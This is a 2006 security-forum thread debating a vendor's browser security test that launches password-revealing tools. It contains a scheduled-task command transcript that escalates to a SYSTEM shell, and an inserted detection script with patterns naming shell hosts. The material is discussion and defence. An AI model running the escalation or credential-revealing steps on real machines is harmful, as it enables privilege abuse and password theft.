Beta browser test - Too harsh? Too mild?

Discussion in 'other security issues & news' started by Bill Stout, Oct 17, 2006.

Thread Status:
Not open for further replies.
  1. Chris12923

    Chris12923 Registered Member

    Joined:
    May 31, 2004
    Posts:
    1,097
Well... You could always read my signature and use the one that has green in its name :) or at least something similar.

    Thanks,

    Chris
     
  2. Bill Stout

    Bill Stout Registered Member

    Joined:
    Oct 14, 2004
    Posts:
    100
    Location:
    Mountain View, CA
    Hey Kevin,
    Since IE7 is out, I've updated the wilderspass.hta to use IE Pass View instead of Password Revealer. It now downloads the binary iepassvw.exe instead of the old password.exe.

    Both password modules reveal too much to include in the scan test. I am searching for a command-line based partial password revealer since I'm not clever enough to write one myself. If anyone knows of one, please let me know.

    I'm also wondering if I should add a scheduler service privilege escalation test since many security vendors miss this easily scripted escalation:
    Code:
    c:\> time /t
    9:00 PM
    c:\> at 21:01 /interactive cmd.exe
    [+C:\]at
    Status ID   Day                     Time          Command Line
    -------------------------------------------------------------------------------
            1   Today                9:01 PM       cmd.exe
    c:\> time /t
    9:01 PM
    [+C:\]tasklist /V | find "cmd.exe"
    ...
    cmd.exe       4660 RDP-Tcp#9     0   2,916 K Running   NT AUTHORITY\SYSTEM
    ...
     
    Last edited: Oct 22, 2006
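The `at` trick in the post above, turned into a detection check. This is an added example and is not part of the thread or of Bill's test. Background a practitioner should keep in mind: on NT 4.0, 2000 and XP the Schedule service runs submitted jobs as LocalSystem, and `/interactive` lets the job put a window on the console desktop, so the resulting `cmd.exe` is a SYSTEM shell that sidesteps any HIPS or firewall rule keyed to the logged-on user. Submitting `at` jobs requires membership in the local Administrators group, though, so this is an Administrators-to-SYSTEM step rather than a limited-user escalation, and from Vista onward session 0 isolation means the interactive window never reaches the user's desktop. The script below scans task-creation records for the pattern (a shell or script host scheduled to run as SYSTEM by a principal other than SYSTEM) and goes beyond the single `cmd.exe` case by also covering command.com, PowerShell, the Windows Script Host executables and mshta (the host that runs the .hta this thread is about). The `TaskEvent` layout and the sample records are constructed for this example; real task-creation audit events (602 on XP, 4698 on Vista and later) carry the same information under different field names, so map them before use.

```python
"""Flag scheduled-task creations that look like `at <time> /interactive cmd.exe`.

Added example, not part of the original thread. TaskEvent is a constructed,
simplified record; its field names are assumptions, not the real audit-event
schema (XP event 602 / Vista+ event 4698 would have to be mapped onto it).
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

SYSTEM_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "SYSTEM", "LOCALSYSTEM"}

# Shells and script hosts that turn a SYSTEM task into a usable SYSTEM foothold.
# Matches the bare name or a full path, with or without ".exe".
SHELL_RE = re.compile(
    r"""(?:^|[\\/\s"'])(?:cmd|command|powershell|pwsh|wscript|cscript|mshta)(?:\.exe)?(?=[\s"']|$)""",
    re.IGNORECASE,
)


@dataclass
class TaskEvent:
    """Constructed task-creation record (assumed field names)."""
    event_id: int      # 602 on XP, 4698 on Vista and later
    creator: str       # account that submitted the job
    task_name: str     # at.exe names its jobs At1.job, At2.job, ...
    command: str       # command line the job will run
    run_as: str        # account the job executes under
    interactive: bool  # desktop-interaction flag (at.exe /interactive)


def is_system_shell_escalation(ev: TaskEvent) -> Tuple[bool, List[str]]:
    """True when a non-SYSTEM principal scheduled a shell to run as SYSTEM."""
    if ev.event_id not in (602, 4698):
        return False, []
    if ev.run_as.upper() not in SYSTEM_ACCOUNTS:
        return False, []            # job stays at the creator's own privilege
    if ev.creator.upper() in SYSTEM_ACCOUNTS:
        return False, []            # SYSTEM scheduling its own work
    if not SHELL_RE.search(ev.command):
        return False, []            # e.g. a defrag run as SYSTEM: ordinary admin work
    reasons = ["shell or script host scheduled to run as SYSTEM by " + ev.creator]
    if ev.interactive:
        reasons.append("desktop-interactive flag set (at.exe /interactive)")
    name = ev.task_name.lower()
    if name.startswith("at") and name.endswith(".job"):
        reasons.append("submitted through at.exe")
    return True, reasons


def scan(events: List[TaskEvent]) -> List[Tuple[str, List[str]]]:
    """Return (task_name, reasons) for every record that matches the pattern."""
    hits = []
    for ev in events:
        flagged, reasons = is_system_shell_escalation(ev)
        if flagged:
            hits.append((ev.task_name, reasons))
    return hits


# Constructed sample records: the post's trick, plus benign look-alikes.
SAMPLE_EVENTS = [
    TaskEvent(602, "WORKSTATION\\bill", "At1.job", "cmd.exe",
              "NT AUTHORITY\\SYSTEM", True),                      # the post's trick
    TaskEvent(4698, "CORP\\admin", "Weekly Defrag", "defrag.exe C: -v",
              "NT AUTHORITY\\SYSTEM", False),                     # benign SYSTEM task
    TaskEvent(4698, "NT AUTHORITY\\SYSTEM", "Maintenance", "cmd.exe /c cleanmgr",
              "NT AUTHORITY\\SYSTEM", False),                     # SYSTEM's own job
    TaskEvent(4698, "CORP\\alice", "Backup", "C:\\WINDOWS\\system32\\cmd.exe /c backup.bat",
              "CORP\\alice", False),                              # runs as the creator
    TaskEvent(4698, "CORP\\bob", "Updater", "\"C:\\Tools\\powershell.exe\" -File x.ps1",
              "SYSTEM", False),                                   # same pattern, no /interactive
]

if __name__ == "__main__":
    for task, why in scan(SAMPLE_EVENTS):
        print(task + ": " + "; ".join(why))
```

Only the first and last sample records are reported: the defrag job runs as SYSTEM but is not a shell, the maintenance job was created by SYSTEM itself, and the backup job never leaves the creator's privilege. The interactive flag and the At*.job name are reported as extra reasons rather than required, since a non-interactive SYSTEM shell is still worth a look.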
  3. Meriadoc

    Meriadoc Registered Member

    Joined:
    Mar 28, 2006
    Posts:
    2,642
    Location:
    Cymru
    - good way to sell greenborder
    - greenborder 5/5
    - initially stopped by my firewall/intrusion, suspicious activity...also running virtual machine so no problem.
    - running antivirus, antispyware only virtual machine, 1/5 (stopping script)

    crank it up now Bill

    Limited a/c is a cheap option - 5/5
     
    Last edited: Oct 22, 2006
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Antivir is in action.
     
  5. Bill Stout

    Bill Stout Registered Member

    Joined:
    Oct 14, 2004
    Posts:
    100
    Location:
    Mountain View, CA
aigle - Looks like you saved it to disk manually. If you ran the hta, did IE Pass View launch before Antivir found it on disk?
     
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
Yes, I did.
Will try it again and let you know. Do you want me to run it directly or after saving it to disk?
     
  7. Bill Stout

    Bill Stout Registered Member

    Joined:
    Oct 14, 2004
    Posts:
    100
    Location:
    Mountain View, CA
Just curious: had you run it from the URL, I would expect IE Pass View to run before Antivir could do anything about it.
     
  8. Wai_Wai

    Wai_Wai Registered Member

    Joined:
    Dec 28, 2004
    Posts:
    556
It's not a cheap option.

It's a free option.

While others keep installing different HIPS, they forget there is already one HIPS on everybody's computer, that is, the limited account HIPS. :)
     
  9. Meriadoc

    Meriadoc Registered Member

    Joined:
    Mar 28, 2006
    Posts:
    2,642
    Location:
    Cymru
    :) yes exactly
     
  10. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
    Tried again both by running directly and by saving it to disk and running afterwards. Antivir is no longer detecting it. It is strange!
     
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
It's interesting now.
Antivir now detects the browser test as malware.

BTW, this test is not beta in my opinion. I would call it alpha.
     
  12. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,559
    Location:
    The Netherlands
    Hi,

I have a few questions about the test: I don't get it, even though I passed all the tests, I still see the "Stolen Files" folder on my desktop. And I also get the blank startup entry, plus the Disk Management tool is launched (without admin rights though).

    To give more info about the events after running the HTA file:

    - Arovax Shield blocks the Startup entry
    - ZoneAlarm Pro blocks HTML Application host from accessing the "Trusted Zone"
    - SSM blocks running "cmd.exe"

    Btw, Windows Scripting Host and Command Prompt are disabled on my system. And my browser (Maxthon) runs in "non-admin" mode. Any comments?
     
    Last edited: Oct 23, 2006
  13. Meriadoc

    Meriadoc Registered Member

    Joined:
    Mar 28, 2006
    Posts:
    2,642
    Location:
    Cymru
Rasheed187, the Disk Management tool launched (blank) with a permissions alert, correct? :) Meaning a pass, as nothing could happen.
Your other two, I don't understand.
     
  14. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
I ran the security test on my computer, and I'd like to say that this security test is nothing more than another marketing attempt aimed at selling a particular security product.
It's like telling me to my face: nadirah, your computer has failed x out of x tests, get GreenBorder today to protect against these threats!
    And of course, my system security is not undermined. I can set more security restrictions at any time I want.
     
  15. Chris12923

    Chris12923 Registered Member

    Joined:
    May 31, 2004
    Posts:
    1,097
I'm not sure what you mean. You failed the tests, but you say your security is not undermined, and then you say you can set more restrictions at any time. Can you explain, please? Also, of course this is a marketing attempt, the same as Comodo releasing a leaktest that I'm pretty sure their product will pass, DCS releasing APT tests which I think Process Guard passes most if not all of, and System Safety Monitor releasing some keylogger test and process termination test which they probably pass as well. So I agree that it is a marketing attempt, but it also tests your security. Or don't you agree?

    Thanks,

    Chris
     
  16. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    I just tried the security test just for fun and gave my comments about it. What I meant was, the browser sec. test does not in any way undermine my system security. I just tried it to see what it could expose about my system.

    I tend to rely more on common sense, knowledge and good safety techniques to secure my system. And it works. So when I say it does not undermine my system security it means that I've verified and confirmed that my system is clean and it is unlikely that anything like this will affect my security unless I let my guard down.
     
  17. Dwarden

    Dwarden Registered Member

    Joined:
    Apr 11, 2003
    Posts:
    177
    Location:
    Czech Republic
So, I went to ... a little test ...

http://www.greenborder.com/scan/index.hta

even if I consider that a false positive ;)
After examining the HTA code, this made me wonder:
http://www.greenborder.com/scan/containment/password.exe
so another test ... oops

So you guys either use a trojan or trojan code in an unchanged way for a "security test" to sell a so-called "security product" by a so-called "security firm" ...

erm ... I guess 'BAN&FORGET' describes what I just applied to anything related to 'Greenborder' on ALL networks I manage ...
     
  18. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Horrid. :cautious:
     
  19. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    According to Dwarden, the results are shocking. I wouldn't advocate Greenborder to anyone at all.
    If you people tried out their password.exe program, and checked the company who made it, password.exe is a malicious program. And please do understand that such programs can be abused by malicious users.

    PRESENTING THE CREATOR OF PASSWORD.EXE
    ---------------------------------------------------
     
    Last edited: Oct 24, 2006
  20. Dwarden

    Dwarden Registered Member

    Joined:
    Apr 11, 2003
    Posts:
    177
    Location:
    Czech Republic
Seems like my sarcastic tone was taken too seriously :)

Anyway, the point was: if you're going to run an online test, make sure no AV/AT/AS can detect it, block it and break it before it starts at all :D :cool: :cautious:

I've been using several Nirsoft tools for quite some time.
     
  21. gerardwil

    gerardwil Registered Member

    Joined:
    Jan 17, 2004
    Posts:
    4,750
    Location:
    EU
    I use several toys from Nirsoft as well, what's wrong with it?

    Gerard
     
  22. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,164
    Location:
    UK / Pakistan
You might call them potentially dangerous software.
     
  23. Bill Stout

    Bill Stout Registered Member

    Joined:
    Oct 14, 2004
    Posts:
    100
    Location:
    Mountain View, CA
Rasheed - In a virtualized environment it appears the folder may get created and virtualized files would get copied. I'll have to look into it, thanks for pointing that out. Also, possibly you tested with GreenBorder disabled, and the folder was there already?

nadirah - Hi, I have control of the tests, but Marketing has control of the website. So, yes, it is one of the many security tests out there, and marketing will use it as well.

In this thread I focused on the test, and I haven't explained what GreenBorder is or does, or that there may be better demonstrations of its protection (such as opening real malware inside the environment). In a nutshell: GreenBorder protects your computer from browser activity and the applications which are used to open downloads. So if there's a .doc file on a website which contains a malicious macro script, you can open it without worry. I also consider an .hta to be a document, since it's not an executable by itself. For more info see the marketing material on the GreenBorder website.

Dwarden - Thanks for the info, looks like the AV vendors are responding to customer queries and the test is earning its own signatures. I purposely separated the wilderspass.hta since I'm testing it using a known Nirsoft tool (which I mentioned earlier in this thread), and it was sure to be flagged (though interesting, because it often launches before it's detected). I think the NirSoft tools are pretty useful and are not malware if people are informed what they do before they launch them, as I did earlier in this thread. Btw - how did you test so many AVs so quickly? That's pretty good. Good night, thanks for finding those AVs.

Also, Dror updated the wilderspass.hta.
     
    Last edited: Oct 24, 2006
  24. Bill Stout

    Bill Stout Registered Member

    Joined:
    Oct 14, 2004
    Posts:
    100
    Location:
    Mountain View, CA
    The activity graphic has been updated, no other functional changes yet.
     
  25. Bill Stout

    Bill Stout Registered Member

    Joined:
    Oct 14, 2004
    Posts:
    100
    Location:
    Mountain View, CA
    I've made two changes today:

    1) It now deletes the registry key it creates.
    2) Wilderspass.hta no longer discloses the complete password. It only queries protected storage though.

    Sorry for the latency, but I'm not a programmer.
     